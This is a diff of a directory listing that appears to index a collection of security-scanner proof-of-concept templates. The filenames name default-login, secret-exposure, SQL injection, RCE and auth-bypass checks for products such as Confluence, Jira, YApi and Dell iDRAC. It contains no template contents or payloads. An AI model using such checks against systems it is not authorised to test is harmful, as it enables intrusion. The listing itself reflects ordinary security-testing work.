./poc/api/mailchimp-api.yaml -./poc/api/mailgun-api-11855.yaml +./poc/api/mailgun-api(1).yaml ./poc/api/mailgun-api.yaml ./poc/api/mapifylite-0f50434af4d25993907702f024089573.yaml ./poc/api/mapifylite-5337e2d76eda361e94ff056a55642367.yaml @@ -919,17 +900,17 @@ ./poc/api/strapi-cms-detect-10539.yaml ./poc/api/strapi-cms-detect-10540.yaml ./poc/api/strapi-cms-detect-10541.yaml -./poc/api/strapi-documentation-10543.yaml +./poc/api/strapi-documentation-10542.yaml ./poc/api/strapi-documentation.yaml ./poc/api/strapi-page-1.yaml ./poc/api/strapi-page-10544.yaml +./poc/api/strapi-page-10545.yaml ./poc/api/strapi-page-10546.yaml ./poc/api/strapi-page-10547.yaml ./poc/api/strapi-page-2.yaml -./poc/api/strapi-page.yaml ./poc/api/strapi-panel-10548.yaml ./poc/api/strapi-panel.yaml -./poc/api/stripe-api-key-11869.yaml +./poc/api/stripe-api-key(1).yaml ./poc/api/stripe-api-key.yaml ./poc/api/swagger-api-1.yaml ./poc/api/swagger-api-10.yaml @@ -1012,14 +993,13 @@ ./poc/api/swagger-api.yaml ./poc/api/tongda-api-ali-fileupload.yaml ./poc/api/tongda-oa-api-ali-upload.yaml -./poc/api/twilio-api-10861.yaml +./poc/api/twilio-api-10860.yaml ./poc/api/twilio-api.yaml ./poc/api/unauth-spark-api-10961.yaml ./poc/api/unauth-spark-api-10962.yaml ./poc/api/unauth-spark-api-10963.yaml ./poc/api/unauth-spark-api-10964.yaml ./poc/api/unauth-spark-api-10965.yaml -./poc/api/unauth-spark-api.yaml ./poc/api/versa-director-api-detect.yaml ./poc/api/video-conferencing-with-zoom-api-075bf74052a0ad5436e52ba850a78457.yaml ./poc/api/video-conferencing-with-zoom-api-123050da768f674023e8ffc84b941d85.yaml @@ -1038,7 +1018,6 @@ ./poc/api/video-conferencing-with-zoom-api-plugin.yaml ./poc/api/video-conferencing-with-zoom-api.yaml ./poc/api/wadl-api-1.yaml -./poc/api/wadl-api-11082.yaml ./poc/api/wadl-api-11083.yaml ./poc/api/wadl-api-11084.yaml ./poc/api/wadl-api-11085.yaml @@ -1065,14 +1044,15 @@ ./poc/api/wpgetapi.yaml ./poc/api/wsdl-api-11632.yaml ./poc/api/wsdl-api-11633.yaml +./poc/api/wsdl-api-11634.yaml ./poc/api/wso2-apimanager-detect-11637.yaml -./poc/api/wso2-apimanager-detect-11638.yaml ./poc/api/wso2-apimanager-detect-11639.yaml ./poc/api/wso2-apimanager-detect.yaml ./poc/api/yapi-detect-11719.yaml ./poc/api/yapi-detect-11720.yaml ./poc/api/yapi-detect-11722.yaml ./poc/api/yapi-rce-11724.yaml +./poc/api/yapi-rce-11725.yaml ./poc/api/yapi-rce-11726.yaml ./poc/api/yapi-rce.yml ./poc/api/yapi-sql-inject.yaml @@ -1083,12 +1063,12 @@ ./poc/api/zentao-api-getModel-api-getMethod-filePath-Anyfileread.yaml ./poc/atlassian/Confluence-SSRF.yaml ./poc/atlassian/Confluence_CVE-2022-26134.yaml +./poc/atlassian/atlassian-bamboo-panel.yaml ./poc/atlassian/atlassian-bamboo-setup-wizard.yaml ./poc/atlassian/atlassian-bamboo-version-detect.yaml ./poc/atlassian/atlassian-bitbucket-loginbypass.yaml ./poc/atlassian/atlassian-crowd-panel-580.yaml ./poc/atlassian/atlassian-crowd-panel-582.yaml -./poc/atlassian/atlassian-crowd-panel-583.yaml ./poc/atlassian/atlassian-crowd-panel-584.yaml ./poc/atlassian/atlassian-crowd-panel-585.yaml ./poc/atlassian/atlassian-crowd-panel.yaml @@ -1102,8 +1082,8 @@ ./poc/atlassian/bitbucket-client-id.yaml ./poc/atlassian/bitbucket-client-secret.yaml ./poc/atlassian/bitbucket-public-repository.yaml +./poc/atlassian/bitbucket-takeover-738.yaml ./poc/atlassian/bitbucket-takeover-739.yaml -./poc/atlassian/bitbucket-takeover-740.yaml ./poc/atlassian/bitbucket-takeover-741.yaml ./poc/atlassian/bitbucket-takeover.yaml ./poc/atlassian/confluence-cve-2015-8399.yml @@ -1114,15 +1094,15 @@ ./poc/atlassian/confluence-dashboard.yaml ./poc/atlassian/confluence-detect-1.yaml ./poc/atlassian/confluence-detect-1186.yaml -./poc/atlassian/confluence-detect-1187.yaml ./poc/atlassian/confluence-detect-1188.yaml +./poc/atlassian/confluence-detect-1189.yaml ./poc/atlassian/confluence-detect-2.yaml ./poc/atlassian/confluence-detect-3.yaml ./poc/atlassian/confluence-detect-4.yaml ./poc/atlassian/confluence-detect.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1190.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1191.yaml -./poc/atlassian/confluence-ssrf-sharelinks-1193.yaml +./poc/atlassian/confluence-ssrf-sharelinks-1192.yaml ./poc/atlassian/confluence-ssrf-sharelinks-1194.yaml ./poc/atlassian/confluence-workflow-1195.yaml ./poc/atlassian/confluence-workflow.yaml @@ -1136,7 +1116,7 @@ ./poc/atlassian/jira-detect-1.yaml ./poc/atlassian/jira-detect-2.yaml ./poc/atlassian/jira-detect-3.yaml -./poc/atlassian/jira-detect-8314.yaml +./poc/atlassian/jira-detect-8313.yaml ./poc/atlassian/jira-detect-8315.yaml ./poc/atlassian/jira-detect-8316.yaml ./poc/atlassian/jira-detect.yaml @@ -1158,11 +1138,11 @@ ./poc/atlassian/jira-unauthenticated-dashboards-8327.yaml ./poc/atlassian/jira-unauthenticated-installed-gadgets-8328.yaml ./poc/atlassian/jira-unauthenticated-installed-gadgets-8329.yaml -./poc/atlassian/jira-unauthenticated-popular-filters-8331.yaml +./poc/atlassian/jira-unauthenticated-installed-gadgets-8330.yaml ./poc/atlassian/jira-unauthenticated-popular-filters.yaml -./poc/atlassian/jira-unauthenticated-projectcategories-8332.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8333.yaml ./poc/atlassian/jira-unauthenticated-projectcategories-8334.yaml +./poc/atlassian/jira-unauthenticated-projectcategories.yaml ./poc/atlassian/jira-unauthenticated-projects-8335.yaml ./poc/atlassian/jira-unauthenticated-projects-8336.yaml ./poc/atlassian/jira-unauthenticated-resolutions-8337.yaml @@ -1172,6 +1152,7 @@ ./poc/atlassian/jira-unauthenticated-user-picker-8341.yaml ./poc/atlassian/jira-unauthenticated.yaml ./poc/atlassian/jira-workflow.yaml +./poc/atlassian/jira_user_piker (copy 1).yaml ./poc/atlassian/jira_user_piker.yaml ./poc/atlassian/jirausername.yaml ./poc/atlassian/poc-yaml-Confluence-ognl-rce.yaml @@ -1197,7 +1178,6 @@ ./poc/auth/Discuz-unauthorized-tools.yaml ./poc/auth/DocCMS-keyword-SQL.yaml ./poc/auth/DocCMS-keyword-sqli.yaml -./poc/auth/Dynatrace-token (copy 1).yaml ./poc/auth/Dynatrace-token.yaml ./poc/auth/EOffice_UserSelect_unauth.yaml ./poc/auth/E_cology-sqli-login.yaml @@ -1240,6 +1220,7 @@ ./poc/auth/Mallbuilder-smarty_config_key-SQLi.yaml ./poc/auth/Mallbuilder-sub_site_key-SQLi.yaml ./poc/auth/Mallbuilder-wap_key-SQLi.yaml +./poc/auth/Mantis-Default_login.yaml ./poc/auth/Metinfo-V5_0_admin_memeber_getpassword-SQLi.yaml ./poc/auth/Metinfo-login_check-SQLi.yaml ./poc/auth/MinIO-default-login.yaml @@ -1257,7 +1238,6 @@ ./poc/auth/PRTGNetwork-DefaultLogin.yaml ./poc/auth/Paypal-braintree-token.yaml ./poc/auth/Pictatic-API-key.yaml -./poc/auth/Redmine-Default-Login.yaml ./poc/auth/SQL_injection-Authentification.yaml ./poc/auth/SSLSessionReq.yaml ./poc/auth/SSLv23SessionReq.yaml @@ -1306,13 +1286,13 @@ ./poc/auth/access-category-password.yaml ./poc/auth/accredible-certificates-19877bfd228a784355caff7bdef8ce37.yaml ./poc/auth/accredible-certificates.yaml -./poc/auth/acemanager-login-23.yaml +./poc/auth/acemanager-login-24.yaml ./poc/auth/acemanager-login-25.yaml ./poc/auth/acemanager-login.yaml -./poc/auth/activemq-default-login-44.yaml ./poc/auth/activemq-default-login-45.yaml ./poc/auth/activemq-default-login-46.yaml ./poc/auth/activemq-default-login-47.yaml +./poc/auth/activemq-default-login-48.yaml ./poc/auth/activemq-default-password.yaml ./poc/auth/activemq-default-password.yml ./poc/auth/acumbamail-signup-forms-800304421471470ce44a3c0fd0b43721.yaml @@ -1343,38 +1323,41 @@ ./poc/auth/adobe-aem-default-credentials-9.yaml ./poc/auth/adobe-component-login-1.yaml ./poc/auth/adobe-component-login-2.yaml -./poc/auth/adobe-component-login-90.yaml +./poc/auth/adobe-component-login-89.yaml +./poc/auth/adobe-component-login-91.yaml ./poc/auth/adobe-component-login-92.yaml ./poc/auth/adobe-component-login.yaml -./poc/auth/adobe-connect-central-login-93.yaml ./poc/auth/adobe-connect-central-login-94.yaml ./poc/auth/adobe-connect-central-login-95.yaml +./poc/auth/adobe-connect-central-login-96.yaml ./poc/auth/adobe-connect-central-login-97.yaml ./poc/auth/adobe-connect-central-login.yaml -./poc/auth/adobe-experience-manager-login-105.yaml +./poc/auth/adobe-experience-manager-login-106.yaml ./poc/auth/adobe-experience-manager-login-107.yaml ./poc/auth/adobe-experience-manager-login-108.yaml ./poc/auth/adobe-experience-manager-login-109.yaml ./poc/auth/adobe-experience-manager-login.yaml ./poc/auth/adobe-secret.yaml -./poc/auth/aem-default-login-140.yaml ./poc/auth/aem-default-login-141.yaml ./poc/auth/aem-default-login-142.yaml +./poc/auth/aem-login-status-167.yaml ./poc/auth/aem-login-status-168.yaml -./poc/auth/aem-login-status-169.yaml ./poc/auth/aem-login-status-170.yaml ./poc/auth/aem-login-status-171.yaml +./poc/auth/aem-secrets.yaml ./poc/auth/aem-sling-login.yaml ./poc/auth/afterlogic-webmail-login.yaml ./poc/auth/age-identity-secret-key.yaml ./poc/auth/age-recipient-public-key.yaml ./poc/auth/aic-intelligent-campus-system-password-leak.yaml ./poc/auth/aic-intelligent-password-leak.yaml -./poc/auth/aims-password-mgmt-client-218.yaml +./poc/auth/aims-password-mgmt-client-219.yaml ./poc/auth/aims-password-mgmt-client-220.yaml +./poc/auth/aims-password-mgmt-client-221.yaml ./poc/auth/aims-password-mgmt-client.yaml ./poc/auth/aims-password-portal-222.yaml ./poc/auth/aims-password-portal-223.yaml +./poc/auth/aims-password-portal-225.yaml ./poc/auth/aims-password-portal.yaml ./poc/auth/aircube-login.yaml ./poc/auth/airflow-default-credentials.yaml @@ -1391,13 +1374,13 @@ ./poc/auth/alibaba-canal-default-password.yaml ./poc/auth/alibaba-canal-default-password.yml ./poc/auth/alibaba-key-id.yaml +./poc/auth/alibaba-mongoshake-unauth-268.yaml ./poc/auth/alibaba-mongoshake-unauth-269.yaml ./poc/auth/alibaba-mongoshake-unauth-270.yaml ./poc/auth/alibaba-nacos-v1-auth-bypass.yml ./poc/auth/alibaba-secret-id.yaml ./poc/auth/alphaweb-default-login-276.yaml ./poc/auth/alphaweb-default-login-277.yaml -./poc/auth/alphaweb-default-login.yaml ./poc/auth/amazon-accesskey-bypass.yaml ./poc/auth/amazon-mws-auth-token-11845.yaml ./poc/auth/amazon-mws-auth-token-281.yaml @@ -1409,8 +1392,8 @@ ./poc/auth/amazon-sns-token.yaml ./poc/auth/ambari-default-credentials-286.yaml ./poc/auth/ambari-default-credentials.yaml -./poc/auth/ambari-default-login-287.yaml ./poc/auth/ambari-default-login-288.yaml +./poc/auth/ambari-default-login-289.yaml ./poc/auth/ambari-default-login-290.yaml ./poc/auth/ambari-default-password.yaml ./poc/auth/amcrest-login-297.yaml @@ -1418,7 +1401,7 @@ ./poc/auth/amcrest-login-299.yaml ./poc/auth/amcrest-login.yaml ./poc/auth/ametys-admin-login-300.yaml -./poc/auth/ametys-admin-login-301.yaml +./poc/auth/ametys-admin-login-302.yaml ./poc/auth/ametys-admin-login.yaml ./poc/auth/ampjuke-default-login.yaml ./poc/auth/anaqua-login-panel.yaml @@ -1430,7 +1413,6 @@ ./poc/auth/apache-couchdb-unauth.yaml ./poc/auth/apache-druid-unauth.yaml ./poc/auth/apache-dubbo-unauth.yaml -./poc/auth/apache-flink-unauth-rce-355.yaml ./poc/auth/apache-flink-unauth-rce-356.yaml ./poc/auth/apache-flink-unauth-rce-357.yaml ./poc/auth/apache-flink-unauth-rce-358.yaml @@ -1445,28 +1427,25 @@ ./poc/auth/apache-tomcat-snoop-cookie-handling.yaml ./poc/auth/apc-login.yaml ./poc/auth/apc-ups-login-382.yaml -./poc/auth/apc-ups-login.yaml ./poc/auth/api-bearer-auth-a2f3021256bf5d76bbaeaff6f05d43fd.yaml ./poc/auth/api-bearer-auth.yaml ./poc/auth/api-fortitoken-cloud.yaml ./poc/auth/api-key-for-google-maps-b973f74f4310543c7180ee3869335562.yaml ./poc/auth/api-key-for-google-maps.yaml ./poc/auth/api-keys.yaml -./poc/auth/api-mojoauth-466.yaml +./poc/auth/api-mojoauth.yaml ./poc/auth/api-onelogin.yaml ./poc/auth/apisix-default-login-491.yaml ./poc/auth/apisix-default-login-492.yaml ./poc/auth/apollo-default-login-520.yaml -./poc/auth/apollo-default-login-521.yaml +./poc/auth/apollo-default-login.yaml ./poc/auth/apple-app-site-association-524.yaml ./poc/auth/apple-app-site-association-526.yaml ./poc/auth/apple-app-site-association.yaml ./poc/auth/appsmith-web-login.yaml ./poc/auth/arcgis-tokens.yaml -./poc/auth/argocd-login-534.yaml ./poc/auth/argocd-login-535.yaml -./poc/auth/argocd-login.yaml -./poc/auth/arl-default-login-537.yaml +./poc/auth/argocd-login-536.yaml ./poc/auth/arl-default-login-538.yaml ./poc/auth/arl-default-login-539.yaml ./poc/auth/arl-default-login-540.yaml @@ -1486,7 +1465,6 @@ ./poc/auth/atlassian-login-default.yaml ./poc/auth/atvise-login-589.yaml ./poc/auth/atvise-login-590.yaml -./poc/auth/atvise-login.yaml ./poc/auth/auth token leake.yaml ./poc/auth/auth-header-manipulation.yaml ./poc/auth/auth-js.yaml @@ -1500,6 +1478,7 @@ ./poc/auth/auth0-e0dcfb20615268d5a66a83645978bad5.yaml ./poc/auth/auth0.yaml ./poc/auth/auth_header.yaml +./poc/auth/authelia-panel.yaml ./poc/auth/authentic-8c2802cf9a9b808fbe84a5b3c21b5317.yaml ./poc/auth/authentic-b81cdffef50a03e77072606b54d17c70.yaml ./poc/auth/authentic-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -1538,22 +1517,22 @@ ./poc/auth/auto-login-when-resister-2f930912217edb47a1b0335c7c11b347.yaml ./poc/auth/auto-login-when-resister.yaml ./poc/auth/avatier-password-management-604.yaml -./poc/auth/avatier-password-management-605.yaml -./poc/auth/avatier-password-management.yaml +./poc/auth/avatier_password_management.yaml ./poc/auth/avigilon-login.yaml ./poc/auth/avtech-password-disclosure.yaml ./poc/auth/aws-access-key-value-622.yaml ./poc/auth/aws-access-key-value-623.yaml +./poc/auth/aws-access-key-value-624.yaml ./poc/auth/aws-access-key-value-625.yaml ./poc/auth/aws-access-key-value.yaml ./poc/auth/aws-access-key.yaml -./poc/auth/aws-opensearch-login-650.yaml +./poc/auth/aws-opensearch-login-649.yaml ./poc/auth/aws-opensearch-login.yaml ./poc/auth/aws-secrets.yaml ./poc/auth/axiom-digitalocean-key-exposure-665.yaml ./poc/auth/axiom-digitalocean-key-exposure-666.yaml -./poc/auth/axiom-digitalocean-key-exposure-667.yaml ./poc/auth/axiom-digitalocean-key-exposure-668.yaml +./poc/auth/axiom-digitalocean-key-exposure.yaml ./poc/auth/axis2-default-login-1.yaml ./poc/auth/axis2-default-login-2.yaml ./poc/auth/axis2-default-login.yaml @@ -1565,9 +1544,9 @@ ./poc/auth/axublog-v1-cookiebypass.yaml ./poc/auth/azkaban-default-login-671.yaml ./poc/auth/azkaban-default-login-672.yaml -./poc/auth/azkaban-default-login-673.yaml ./poc/auth/azkaban-default-login-674.yaml ./poc/auth/azkaban-default-login-675.yaml +./poc/auth/azkaban-default-login.yaml ./poc/auth/azkaban-default-password.yaml ./poc/auth/azkaban-web-client-default-creds.yaml ./poc/auth/azure-apim-secret-key-disclosure.yaml @@ -1575,14 +1554,15 @@ ./poc/auth/bang-resto-weak-password.yaml ./poc/auth/bangyong-pm2-global_userlogin-sqli-rce.yaml ./poc/auth/basic-auth-detect.yaml -./poc/auth/basic-auth-detection-687.yaml ./poc/auth/basic-auth-detection-688.yaml +./poc/auth/basic-auth-detection-689.yaml ./poc/auth/basic-auth-detection-691.yaml ./poc/auth/basic-auth-detection.yaml ./poc/auth/baw-login-logout-menu-321724627690a73c1b0fd584b423f0df.yaml ./poc/auth/baw-login-logout-menu.yaml ./poc/auth/bazarr-login-700.yaml ./poc/auth/bazarr-login-701.yaml +./poc/auth/bazarr-login-702.yaml ./poc/auth/bazarr-login.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-0c04f03046971ace3308f75f8502712f.yaml ./poc/auth/bbpress-login-register-links-on-forum-topic-pages-4cedc7b2a0c00a81096cf3fcc283b780.yaml @@ -1609,8 +1589,8 @@ ./poc/auth/beyondtrust-login-server-718.yaml ./poc/auth/beyondtrust-login-server.yaml ./poc/auth/bigant-login-panel.yaml +./poc/auth/bigbluebutton-login-724.yaml ./poc/auth/bigbluebutton-login-725.yaml -./poc/auth/bigbluebutton-login-726.yaml ./poc/auth/bigbluebutton-login.yaml ./poc/auth/bigfix-login.yaml ./poc/auth/biometric-login-for-woocommerce-56a06f7ec0c2351c343ea2384b7dbd44.yaml @@ -1637,9 +1617,9 @@ ./poc/auth/blossom-spa.yaml ./poc/auth/blossomthemes-email-newsletter-7dc6edac570bf028c64b4de6d220672b.yaml ./poc/auth/blossomthemes-email-newsletter.yaml -./poc/auth/blue-iris-login-751.yaml ./poc/auth/blue-iris-login-752.yaml ./poc/auth/blue-iris-login-753.yaml +./poc/auth/blue-iris-login-754.yaml ./poc/auth/blue-iris-login.yaml ./poc/auth/bluet-keywords-tooltip-generator-71ffb92be6862dd3422bd8a61ad3a3ae.yaml ./poc/auth/bluet-keywords-tooltip-generator-9f8dfb534ce422b5a9c6344470f1b6e5.yaml @@ -1649,11 +1629,10 @@ ./poc/auth/bomgar-login-panel.yaml ./poc/auth/braintree-access-token-772.yaml ./poc/auth/braintree-access-token-773.yaml -./poc/auth/braintree-access-token.yaml ./poc/auth/branch-key-774.yaml ./poc/auth/branch-key.yaml ./poc/auth/brother-unauthorized-access-791.yaml -./poc/auth/brother-unauthorized-access-792.yaml +./poc/auth/brother-unauthorized-access-793.yaml ./poc/auth/brother-unauthorized-access.yaml ./poc/auth/brute-force-login-protection-20bc35cc9dd5149e33075d4261e715a7.yaml ./poc/auth/brute-force-login-protection.yaml @@ -1668,9 +1647,9 @@ ./poc/auth/camunda-login-panel-1.yaml ./poc/auth/camunda-login-panel-2.yaml ./poc/auth/camunda-login-panel.yaml +./poc/auth/canal-default-login-846.yaml ./poc/auth/canal-default-login-847.yaml ./poc/auth/canal-default-login-848.yaml -./poc/auth/canal-default-login-849.yaml ./poc/auth/canal-default-login.yaml ./poc/auth/captcha-code-authentication-198c2fa27cc518c127d49255679341f9.yaml ./poc/auth/captcha-code-authentication-c7faba710d318637d4639fc04a02d42a.yaml @@ -1715,7 +1694,6 @@ ./poc/auth/check-register_argc_argv.yaml ./poc/auth/checkmk-login.yaml ./poc/auth/chefio-login-check.yaml -./poc/auth/chinaunicom-default-login-906.yaml ./poc/auth/chinaunicom-default-login-907.yaml ./poc/auth/chinaunicom-default-login-908.yaml ./poc/auth/chinaunicom-default-login-909.yaml @@ -1725,16 +1703,16 @@ ./poc/auth/chinaunicom-modem-default-password.yml ./poc/auth/ciphertrust-default-password-vulnerability.yaml ./poc/auth/circarlife-default-login.yaml -./poc/auth/cisco-finesse-login-938.yaml ./poc/auth/cisco-finesse-login-939.yaml +./poc/auth/cisco-finesse-login-940.yaml ./poc/auth/cisco-finesse-login.yaml ./poc/auth/cisco-integrated-login-941.yaml ./poc/auth/cisco-integrated-login-942.yaml ./poc/auth/cisco-integrated-login.yaml +./poc/auth/cisco-systems-login-973.yaml ./poc/auth/cisco-systems-login-974.yaml -./poc/auth/cisco-systems-login-975.yaml ./poc/auth/cisco-systems-login.yaml -./poc/auth/cisco-ucs-kvm-login-980.yaml +./poc/auth/cisco-ucs-kvm-login-979.yaml ./poc/auth/cisco-ucs-kvm-login.yaml ./poc/auth/cisco-vmanage-login.yaml ./poc/auth/citrix-cve-2020-8193-unauthorized.yml @@ -1757,7 +1735,7 @@ ./poc/auth/clickhouse-api-unauth.yaml ./poc/auth/clickhouse-db-unauth.yaml ./poc/auth/clickhouse-server-Unauthorized-Sql.yaml -./poc/auth/clickhouse-unauth-1003.yaml +./poc/auth/clickhouse-unauth-1002.yaml ./poc/auth/clickhouse-unauth-1004.yaml ./poc/auth/clickhouse-unauth-api.yaml ./poc/auth/clickhouse-unauth.yaml @@ -1781,15 +1759,13 @@ ./poc/auth/co-authors-plus-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/auth/co-authors-plus-plugin.yaml ./poc/auth/co-authors-plus.yaml -./poc/auth/cobbler-default-login-1119.yaml +./poc/auth/cobbler-default-login-1118.yaml ./poc/auth/cobbler-default-login-1120.yaml ./poc/auth/cobbler-default-login-1121.yaml -./poc/auth/cobbler-default-login.yaml ./poc/auth/code-climate-token.yaml ./poc/auth/code-server-login.yaml ./poc/auth/codecov-access-token.yaml ./poc/auth/codepen-login-check.yaml -./poc/auth/codian-mcu-login-1139.yaml ./poc/auth/codian-mcu-login-1140.yaml ./poc/auth/coinbase-access-token.yaml ./poc/auth/coldfusion-administrator-login-1144.yaml @@ -1802,6 +1778,7 @@ ./poc/auth/commax-biometric-auth-bypass-1157.yaml ./poc/auth/commax-credentials-disclosure-1158.yaml ./poc/auth/commax-credentials-disclosure-1159.yaml +./poc/auth/commax-credentials-disclosure-1160.yaml ./poc/auth/composer-auth-json.yaml ./poc/auth/comtrend-password-exposure-1166.yaml ./poc/auth/comtrend-password-exposure-1167.yaml @@ -1880,12 +1857,13 @@ ./poc/auth/credential-exposure-file.yaml ./poc/auth/credential-exposure.yaml ./poc/auth/credentials (copy 1).yaml -./poc/auth/credentials-1258.yaml +./poc/auth/credentials-1257.yaml ./poc/auth/credentials-1259.yaml ./poc/auth/credentials-disclosure-1252.yaml ./poc/auth/credentials-disclosure-1253.yaml ./poc/auth/credentials-disclosure-1254.yaml ./poc/auth/credentials-disclosure-1255.yaml +./poc/auth/credentials-disclosure-1256.yaml ./poc/auth/credentials-disclosure-all.yaml ./poc/auth/credentials-json.yaml ./poc/auth/credentials.yaml @@ -1895,12 +1873,15 @@ ./poc/auth/credova-financial.yaml ./poc/auth/crush-ftp-login-1273.yaml ./poc/auth/crush-ftp-login-1274.yaml +./poc/auth/crush-ftp-login-1275.yaml ./poc/auth/crush-ftp-login.yaml ./poc/auth/crushftp-anonymous-login.yaml +./poc/auth/crushftp-default-login.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1281.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1282.yaml ./poc/auth/cs-cart-unauthenticated-lfi-1283.yaml -./poc/auth/cs-cart-unauthenticated-lfi-1285.yaml +./poc/auth/cs-cart-unauthenticated-lfi-1284.yaml +./poc/auth/cs-cart-unauthenticated-lfi.yaml ./poc/auth/cs141-default-login-1.yaml ./poc/auth/cs141-default-login-1277.yaml ./poc/auth/cs141-default-login-1279.yaml @@ -1974,16 +1955,15 @@ ./poc/auth/dbeaver-credentials-6777.yaml ./poc/auth/dbeaver-credentials-6778.yaml ./poc/auth/dbeaver-credentials-6779.yaml -./poc/auth/dbeaver-credentials-6780.yaml ./poc/auth/dbeaver-credentials-6781.yaml ./poc/auth/dbeaver-credentials-6782.yaml ./poc/auth/dell-emc-ecom-default-credentials-6917.yaml ./poc/auth/dell-emc-ecom-default-credentials.yaml ./poc/auth/dell-idrac-default-login-6942.yaml -./poc/auth/dell-idrac-default-login-6943.yaml ./poc/auth/dell-idrac-default-login-6944.yaml ./poc/auth/dell-idrac-default-login-6945.yaml ./poc/auth/dell-idrac-default-login-6946.yaml +./poc/auth/dell-idrac-default-login.yaml ./poc/auth/dell-idrac9-default-login-6930.yaml ./poc/auth/dell-idrac9-default-login-6931.yaml ./poc/auth/dell-idrac9-default-login-6932.yaml @@ -1994,9 +1974,7 @@ ./poc/auth/dell-openmanager-login-1.yaml ./poc/auth/dell-openmanager-login-2.yaml ./poc/auth/dell-openmanager-login-6948.yaml -./poc/auth/dell-openmanager-login-6949.yaml ./poc/auth/dell-openmanager-login-6950.yaml -./poc/auth/dell-openmanager-login-6951.yaml ./poc/auth/dell-openmanager-login.yaml ./poc/auth/dell-remote-power-management-default-login.yaml ./poc/auth/dell-wyse-login-6952.yaml @@ -2019,6 +1997,7 @@ ./poc/auth/dir-100-login-panel.yaml ./poc/auth/dir-600-login-panel.yaml ./poc/auth/dir-850l-login-panel.yaml +./poc/auth/directadmin-login-panel-7000.yaml ./poc/auth/directadmin-login-panel-7001.yaml ./poc/auth/directadmin-login-panel.yaml ./poc/auth/directum-login.yaml @@ -2028,7 +2007,7 @@ ./poc/auth/discord-cilent-secret.yaml ./poc/auth/discuz-wechat-plugins-unauth.yaml ./poc/auth/discuz-wechat-plugins-unauth.yml -./poc/auth/django-secret-key.yaml +./poc/auth/django-secret.key.yaml ./poc/auth/dlink-850l-password-leak.yaml ./poc/auth/dlink-ac-centralized-management-system-default-login.yaml ./poc/auth/dlink-ac-default-password.yaml @@ -2050,6 +2029,7 @@ ./poc/auth/dologin-plugin.yaml ./poc/auth/dologin.yaml ./poc/auth/dolphinscheduler-default-login-7072.yaml +./poc/auth/dolphinscheduler-default-login-7073.yaml ./poc/auth/doppler-api-token.yaml ./poc/auth/dpt-oauth-client-c816cf65f82ebdf2ade35164058fc67e.yaml ./poc/auth/dpt-oauth-client-f37b20b98f49a19d8d00195f0b6db9ea.yaml @@ -2088,22 +2068,22 @@ ./poc/auth/drupal_module-super_login-cross-site-scripting.yaml ./poc/auth/drupal_module-token_custom-arbitrary-php-code-execution.yaml ./poc/auth/drupal_module-yubikey-access-bypass.yaml +./poc/auth/dubbo-admin-default-login-7120.yaml ./poc/auth/dubbo-admin-default-login-7121.yaml -./poc/auth/dubbo-admin-default-login.yaml ./poc/auth/dubbo-admin-default-password.yaml ./poc/auth/dubbo-admin-default-password.yml ./poc/auth/duffel-api-token.yaml ./poc/auth/dvwa-default-login-7126.yaml -./poc/auth/dvwa-default-login-7127.yaml ./poc/auth/dvwa-default-login-7128.yaml ./poc/auth/dvwa-default-login-7129.yaml -./poc/auth/dvwa-headless-automatic-login-7130.yaml +./poc/auth/dvwa-default-login.yaml +./poc/auth/dvwa-headless-automatic-login-7131.yaml ./poc/auth/dvwa-headless-automatic-login-7132.yaml ./poc/auth/dvwa-headless-automatic-login-7133.yaml ./poc/auth/dvwa-headless-automatic-login.yaml ./poc/auth/dynamically-register-sidebars-a3329eaa025f4bd78463fd98e337add9.yaml ./poc/auth/dynamically-register-sidebars.yaml -./poc/auth/dynatrace-token-7146.yaml +./poc/auth/dynatrace-token-7145.yaml ./poc/auth/dynatrace-token.yaml ./poc/auth/e-cology-verify-quick-login-user-login.yaml ./poc/auth/e-learning-system-authentication-bypass-rce.yaml @@ -2163,13 +2143,12 @@ ./poc/auth/electric-studio-client-login-f80c5406ebadb06c127dd29569b85330.yaml ./poc/auth/electric-studio-client-login.yaml ./poc/auth/email-verification-token-bypass.yaml -./poc/auth/emcecom-default-login-7211.yaml ./poc/auth/emcecom-default-login-7212.yaml ./poc/auth/emcecom-default-login-7213.yaml ./poc/auth/emcecom-default-login-7214.yaml ./poc/auth/emqx-default-login-7221.yaml +./poc/auth/emqx-default-login-7222.yaml ./poc/auth/emqx-default-login.yaml -./poc/auth/ems-login-panel-7223.yaml ./poc/auth/ems-login-panel-7224.yaml ./poc/auth/ems-login-panel-7225.yaml ./poc/auth/ems-login-panel.yaml @@ -2179,7 +2158,6 @@ ./poc/auth/epmp-login-7228.yaml ./poc/auth/epmp-login-7229.yaml ./poc/auth/epmp-login-7230.yaml -./poc/auth/epmp-login.yaml ./poc/auth/epson-unauthorized-access-detect.yaml ./poc/auth/erident-custom-login-and-dashboard-0e2a68c6bc5c7e524706a5b5493bef90.yaml ./poc/auth/erident-custom-login-and-dashboard-65d615ac22cc89343ec17e71c91783a6.yaml @@ -2193,8 +2171,6 @@ ./poc/auth/esafenet-cdgserver3-linkfilterservice-bypassauth.yaml ./poc/auth/esafenet-cdgserver3-systemconfig-default-password.yaml ./poc/auth/esxi-unauthorized-access.yaml -./poc/auth/etcd-keys-7261.yaml -./poc/auth/etcd-keys-7262.yaml ./poc/auth/etcd-keys.yaml ./poc/auth/etcd-unauth.yaml ./poc/auth/etcd-unauth.yml @@ -2220,7 +2196,7 @@ ./poc/auth/exacqvision-default-login-7274.yaml ./poc/auth/exacqvision-default-login-7275.yaml ./poc/auth/exacqvision-default-login-7276.yaml -./poc/auth/exacqvision-default-login-7277.yaml +./poc/auth/exacqvision-default-login.yaml ./poc/auth/exacqvision-default-password.yaml ./poc/auth/exchange-addon-authorize-net-d43cc9eb0f6efba271859825f9179410.yaml ./poc/auth/exchange-addon-authorize-net.yaml @@ -2237,7 +2213,6 @@ ./poc/auth/facebook-api-token.yaml ./poc/auth/facebook-secret-7386.yaml ./poc/auth/facebook-secret.yaml -./poc/auth/facebook-secrets.yaml ./poc/auth/fake-auth-bypass.yaml ./poc/auth/fake-auth-header-auth-bypass.yaml ./poc/auth/fake-referer-header-auth-bypass.yaml @@ -2249,13 +2224,11 @@ ./poc/auth/fanwei-unauth.yaml ./poc/auth/faraday-login-7393.yaml 